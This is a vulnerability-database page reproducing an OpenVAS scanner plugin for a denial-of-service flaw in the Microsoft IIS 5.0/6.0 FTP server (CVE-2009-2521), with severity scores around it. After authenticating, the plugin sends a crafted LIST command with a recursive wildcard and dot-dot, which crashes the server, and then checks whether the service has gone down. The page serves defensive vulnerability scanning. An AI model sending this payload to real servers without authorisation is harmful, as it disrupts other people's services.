Lucene search

K
openvasCopyright (C) 2009 Greenbone AGOPENVAS:1361412562310900944
HistorySep 18, 2009 - 12:00 a.m.

Microsoft IIS FTP Server 'ls' Command DoS Vulnerability

2009-09-1800:00:00
Copyright (C) 2009 Greenbone AG
plugins.openvas.org
31

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

6.3 Medium

AI Score

Confidence

Low

0.971 High

EPSS

Percentile

99.8%

Microsoft IIS with FTP server is prone to a denial of service (DoS) vulnerability.

# SPDX-FileCopyrightText: 2009 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:microsoft:ftp_service";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.900944");
  script_version("2023-12-20T05:05:58+0000");
  script_tag(name:"last_modification", value:"2023-12-20 05:05:58 +0000 (Wed, 20 Dec 2023)");
  script_tag(name:"creation_date", value:"2009-09-18 08:01:03 +0200 (Fri, 18 Sep 2009)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_cve_id("CVE-2009-2521");
  script_name("Microsoft IIS FTP Server 'ls' Command DoS Vulnerability");
  script_xref(name:"URL", value:"http://www.microsoft.com/technet/security/advisory/975191.mspx");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/36273");
  script_xref(name:"URL", value:"http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html");
  script_xref(name:"URL", value:"http://blogs.technet.com/msrc/archive/2009/09/01/microsoft-security-advisory-975191-released.aspx");
  script_xref(name:"URL", value:"http://blogs.technet.com/msrc/archive/2009/09/03/microsoft-security-advisory-975191-revised.aspx");

  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2009 Greenbone AG");
  script_family("Denial of Service");
  script_dependencies("secpod_ms_iis_ftpd_detect.nasl", "logins.nasl");
  script_require_ports("Services/ftp", 21);
  script_mandatory_keys("MS/IIS-FTP/Installed");

  script_tag(name:"impact", value:"Successful exploitation will allow remote authenticated users to crash the
  application leading to denial of service condition.");

  script_tag(name:"affected", value:"Microsoft Internet Information Services version 5.0 and 6.0.");

  script_tag(name:"insight", value:"A stack consumption error occurs in the FTP server while processing crafted
  LIST command containing a wildcard that references a subdirectory followed by
  a .. (dot dot).");

  script_tag(name:"solution", value:"Upgrade to IIS version 7.5");

  script_tag(name:"summary", value:"Microsoft IIS with FTP server is prone to a denial of service (DoS) vulnerability.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("ftp_func.inc");
include("host_details.inc");

if(!port = get_app_port(cpe:CPE, service:"ftp"))
  exit(0);

if(!get_app_location(cpe:CPE, port:port, nofork:TRUE))
  exit(0);

soc = open_sock_tcp(port);
if(!soc)
  exit(0);

kb_creds = ftp_get_kb_creds();
login = kb_creds["login"];
pass = kb_creds["pass"];

if(ftp_authenticate(socket:soc, user:login, pass:pass)) {

  cmd = 'LIST "-R */../"\r\n'; # The IIS server crashes and restarted.
  send(socket:soc, data:cmd);
  sleep(10);
  buff = recv(socket:soc, length:1024);

  ecmd = 'LIST\r\n';
  send(socket:soc, data:ecmd);
  eresp = recv(socket:soc, length:1024);
  if("Can't open data connection" >< eresp){
    security_message(port:port);
  }
}

close(soc);

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

6.3 Medium

AI Score

Confidence

Low

0.971 High

EPSS

Percentile

99.8%